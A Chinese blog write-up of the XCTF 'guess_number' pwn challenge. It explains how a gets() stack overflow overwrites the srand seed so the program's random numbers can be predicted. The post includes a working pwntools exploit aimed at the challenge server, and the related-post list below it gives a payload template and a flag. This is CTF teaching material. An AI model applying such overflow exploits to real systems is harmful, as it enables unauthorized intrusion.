攻防世界 Pwn guess_number

最新推荐文章于 2023-10-30 19:01:30 发布
原创 最新推荐文章于 2023-10-30 19:01:30 发布 · 174 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #安全

本文详细介绍了如何利用栈溢出攻击解决攻防世界中的Pwnguess_number挑战。通过checksec分析程序安全性,使用IDA反汇编了解代码流程,发现可以通过输入字符串覆盖seed来控制随机数生成。通过精心构造payload,设置相同的随机数种子并预测随机数,最终成功连续猜中10次。提供的exploit代码展示了整个过程,实现了远程连接并成功破解目标程序。

攻防世界 Pwn guess_number

目录

1.checksec走一下

在这里插入图片描述

2.IDA反汇编看一下

在这里插入图片描述
在这里插入图片描述

3.根据上图代码,分析基本流程

流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。

初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。

于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子?

查看c源码,发现有gets把输入的字符串保存到本地变量v9,查看v9,发现:v9和seed之间差距30-10+1=21个单元。于是,我们就可以想到通过栈溢出的方法把v9的值覆盖seed。给出exp。
在这里插入图片描述

4.exp附上

from pwn import *
from ctypes import *
 
io = remote('220.249.52.133', 54835)
 
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload = 'a' * 0x20 + p64(1).decode()
io.recvuntil('Your name:')
io.sendline(payload)
libc.srand(1)
for i in range(10):
    num = str(libc.rand()%6+1)
    io.recvuntil('number:')
    io.sendline(num)
io.interactive()

5.运行结果

在这里插入图片描述

6.题目下载地址

点击下载

攻防世界 guess_num
09-27 1189
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
[攻防世界]guess_num
逆向萌新的博客
06-01 864
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1775
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界-guess_num
qq_45771413的博客
04-23 622
查看保护 好家伙,不留活口(;´д`)ゞ IDA 逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作: 输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”); 分析 10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。 本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞: 可以看到v7下面就是s
攻防世界guess_num
Rt1Text的博客
03-27 630
题目 一点信息:猜数字 虚拟机里checksec
攻防世界PWN-guess_num
Deeeelete的博客
11-16 849
题目:guess_num checksec查看详情 64位以及各种防护全开 运行一下逻辑,的确是一个猜数游戏 进64位IDA 反编译main函数 出源码 摘代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { FILE *v3; // rdi@1 __int64 v4; // rax@1 const char *v5; // rdi@1 __int64 result; // rax@7 __in
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1358
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
攻防世界 Pwn 新手
yongbaoii的博客
10-04 4272
是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类 这里面的每个题我都没有去检查保护,太麻烦,新手区也没有需要绕过保护的,最简单的canary绕过也在进阶。 ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客 字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题 01 get_shell 1、nc连接就行2、简单的exp from pwn import* r=remote("220.249.52.133
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1563
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
攻防世界pwnguess_num】
SUOYE_GUANXING的博客
10-30 375
flag为:cyberpeace{08b9d2e122fdcc5cfd4c7955eb732ae1}看这里,一开始还以为是我输入一个数,可以看到它会回显的数字;0x30-0x10;需要0x20个字符来让它溢出;使用ida64打开;进入gets漏洞点看;
攻防世界 - pwn - guess_num
qq726232111的博客
03-16 1178
A、程序分析 1、 分析程序发现连续输入密码正确10次即可获取flag 2、 gets(0,rbp-30h) srand(rbp-10h) 通过输入用户名可以覆盖srand的种子,srand rand为伪随机,种子一样时随机数相同 3、 ...
攻防世界-guess_num-Writeup
SkYe's Blog
05-15 545
guess_num [collapse title=“展开查看详情” status=“false”] 考察点:利用栈溢出固定随机数 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+4h] [rbp-3Ch] int i; // [rsp+8h] [rbp-38h] int v6; // [rsp+Ch] [rbp-34h] char v7; // [rsp+10h] [rbp-30h]
攻防世界 pwn 练习区 guess_num
ChaoYue_miku的博客
07-12 909
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
攻防世界逆向 Guess-the-Number分析
yoyo_573的博客
09-26 646
使用java反编译软件查看源码 jd-gui 链接:https://pan.baidu.com/s/1oP-oHKwRS5WUNuOPTYmGzA 提取码:ddzg 看源码 定义了一个XRO函数,对str_one和str_two进行异或操作返回16进制字符串,得到的就是flag 转成python代码如下 str_one ='4b64ca12ace755516c178f72d05d7061' str_two ="ecd44646cfe5994ebeb35bf922e25dba" """ 1、int(x,ba
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1563
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
攻防世界pwn题目int_overflow
最新发布
03-08
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在栈溢出风险[^2]。 对于这类问题的一个常见解决方法涉及以下几个方面: #### 分析目标程序 使用反汇编工具IDA可以深入分析二进制文件的工作原理。通过将题目中的可执行文件加载至IDA中并检查其主要逻辑流程,能够识别潜在的安全缺陷位置。特别是要注意那些未启用安全防护机制(如stack canary)的情况,在Ubuntu环境下测试可以帮助确认这一点。 #### 构造有效载荷(Payload) 基于发现的漏洞特性来构建特定的有效载荷是非常重要的一步。例如,在某些情况下,可以通过向缓冲区填充足够的数据直到覆盖返回地址,并指向一个已知地址处的gadget链或直接调用系统函数实现控制流劫持的目的。Python库`pwntools`提供了便捷的方法用于创建这样的payloads,并且支持本地调试和远程连接服务器提交攻击尝试[^3]。 ```python from pwn import * # 设置目标IP和端口 target_ip = "example.com" port_num = 12345 # 创建远程连接对象 io = remote(target_ip, port_num) # 定义payload结构 offset_to_ret_addr = ... # 需要根据实际情况调整偏移量大小 rop_chain_or_function_ptr = ... payload = b'A' * offset_to_ret_addr + pack(rop_chain_or_function_ptr) # 发送payload给服务端 io.sendlineafter(b"prompt:", payload) ``` 请注意上述代码片段仅为模板示意;实际操作前需依据具体情况进行适当修改以适应不同场景下的需求。 #### 测试与验证 完成以上准备工作之后,应当在一个受控环境中反复试验所设计出来的exploit直至成功获取shell或其他预期效果为止。同时也要注意遵守比赛规则和服务条款,确保行为合法合规[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值